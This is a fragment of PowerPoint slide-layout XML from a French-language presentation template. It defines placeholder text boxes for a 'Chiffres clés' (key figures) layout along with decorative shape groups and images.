          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681328" y="250834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0" name="Espace réservé du texte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57809DC5-2FCB-4C37-9C34-F8655BD7D299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="690854" y="370944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1" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFCE6AC5-AB03-48BE-93AF-44941AE07CA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681328" y="446922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2" name="Espace réservé du texte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C4B6399-9D3C-4DFF-99D7-550879A9C491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="26" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2987014" y="174856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3" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4896DB53-6724-44F3-8EDA-9737E92109F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="27" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2977488" y="250834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5" name="Espace réservé du texte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3A895D1-8583-4B9D-8070-26DE3C4365F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="28" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2987014" y="370944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7" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A0C6E1C-59F3-4DC1-AA30-3DF5BBA87942}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="29" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2977488" y="446922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41" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76F2F9D7-38C4-4D14-96B3-0E87DD6FFC24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="690245" y="456565"/>
            <a:ext cx="2222232" cy="480131"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2800" b="0">
                <a:latin typeface="Gilroy Bold" panose="020B0604020202020204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="215900" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Chiffres clés</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Groupe 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F61ABAB-B7D6-42F6-BBA2-98974B049F0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F2CDEAA-7386-43AF-938D-EDFA2CAF8C2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8" name="Rectangle 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5592031-C444-4DB1-9245-8E6CC753DCE9}"/>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52" name="Groupe 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41CD2802-9BE8-4269-B2AE-FC499F184E07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="7045594" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="53" name="Groupe 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8A761A7-BE82-4D86-A7F0-EACBA1B964AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7045594" y="2588002"/>
              <a:ext cx="1885826" cy="1681996"/>
              <a:chOff x="2689543" y="1651754"/>
              <a:chExt cx="1885826" cy="1681996"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56" name="Freeform 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8A8D478-9732-4580-B1A0-22EF7FB16434}"/>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7" name="Rectangle 56">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF10F985-92F1-4E98-AC80-33EE5597B985}"/>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54" name="Image 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{230F76E5-DFAE-45D3-A6BE-FC1868E5789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55" name="Image 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4695C35B-A8AC-477D-8246-A4676B3BBD2B}"/>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364857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Figures + Title + Txt (B)">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle : avec coin arrondi 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9A06504-FCA9-45BA-9D5D-E96369C35535}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="-1" y="0"/>
            <a:ext cx="5090161" cy="6858001"/>
          </a:xfrm>
          <a:prstGeom prst="round1Rect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3581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34" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F933F5C5-250E-4CC6-8075-DD98ECE46CB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5357500" y="1668111"/>
            <a:ext cx="6558875" cy="2215991"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF732074-D0EF-4870-8D8F-BAE379175E9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4700016" y="6457666"/>
            <a:ext cx="2623233"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BAE4CD4A-29C0-45EE-AFBF-DF78D6B3EE29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A0F0481-0AD7-45BC-85E3-CC61DBC6B167}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558732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9" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20630A20-7FA3-457D-AA5B-C4EFBC3C5F9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5587320"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8" name="Espace réservé du texte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1A556E5-476E-4843-856D-99EDFFF27EC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="690854" y="174856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10" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D9C2CC3-F004-4897-AF41-3D0151D1D8A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681328" y="250834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0" name="Espace réservé du texte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57809DC5-2FCB-4C37-9C34-F8655BD7D299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="690854" y="370944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1" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFCE6AC5-AB03-48BE-93AF-44941AE07CA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681328" y="446922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2" name="Espace réservé du texte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C4B6399-9D3C-4DFF-99D7-550879A9C491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="26" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2987014" y="174856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3" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4896DB53-6724-44F3-8EDA-9737E92109F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="27" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2977488" y="250834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35" name="Espace réservé du texte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3A895D1-8583-4B9D-8070-26DE3C4365F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="28" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2987014" y="3709444"/>
            <a:ext cx="1473200" cy="747897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="5400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gilroy Bold" panose="020B0604020202020204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A0C6E1C-59F3-4DC1-AA30-3DF5BBA87942}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="29" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2977488" y="4469221"/>
            <a:ext cx="1482726" cy="480131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1400" b="0" cap="all" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Détails du</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>chiffre clé</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76F2F9D7-38C4-4D14-96B3-0E87DD6FFC24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="690245" y="456565"/>
            <a:ext cx="2222232" cy="480131"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2800" b="0">
                <a:latin typeface="Gilroy Bold" panose="020B0604020202020204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="215900" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Chiffres clés</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="Image 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{216562D9-467B-4568-98CB-72A467E9F9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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Groupe 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E960813D-F6D5-489A-8E1A-1FFB0A3CBA93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{297D50A0-F701-44A2-8345-042FEFBE3A4D}"/>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6" name="Rectangle 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77075047-0DF2-40A9-8934-83978E18AEB8}"/>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45" name="Groupe 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC232868-A320-43A0-BF91-FF37BDEE71D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="7045594" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="46" name="Groupe 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D6A6CC9-C503-4ADF-842E-EF51211A0624}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7045594" y="2588002"/>
              <a:ext cx="1885826" cy="1681996"/>
              <a:chOff x="2689543" y="1651754"/>
              <a:chExt cx="1885826" cy="1681996"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49" name="Freeform 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{273DF3B3-57AE-4B99-A975-048A723D6293}"/>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0" name="Rectangle 49">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E51DE81E-D999-41C5-B9F1-718B9FEC84B2}"/>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47" name="Image 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5A11245-67F5-43CF-8813-8EFADDE5975B}"/>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8" name="Image 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B6C44EC-5ACD-463A-8C2C-C556DB7ADD5F}"/>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2223882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ict + Chapt + Title + 4 Elements">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Espace réservé pour une image  36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BF4E86B-9E00-4211-9704-28C3ED86A413}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="5090160" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5090160"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY2" fmla="*/ 3429000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY3" fmla="*/ 3719195 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY4" fmla="*/ 4747789 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY5" fmla="*/ 4951799 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY6" fmla="*/ 4951800 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY7" fmla="*/ 4987731 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY8" fmla="*/ 5030435 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 5089114 w 5090160"/>
              <a:gd name="connsiteY9" fmla="*/ 5030435 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 5087876 w 5090160"/>
              <a:gd name="connsiteY10" fmla="*/ 5080986 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 3316135 w 5090160"/>
              <a:gd name="connsiteY11" fmla="*/ 6855567 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 3307971 w 5090160"/>
              <a:gd name="connsiteY12" fmla="*/ 6855774 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 3307971 w 5090160"/>
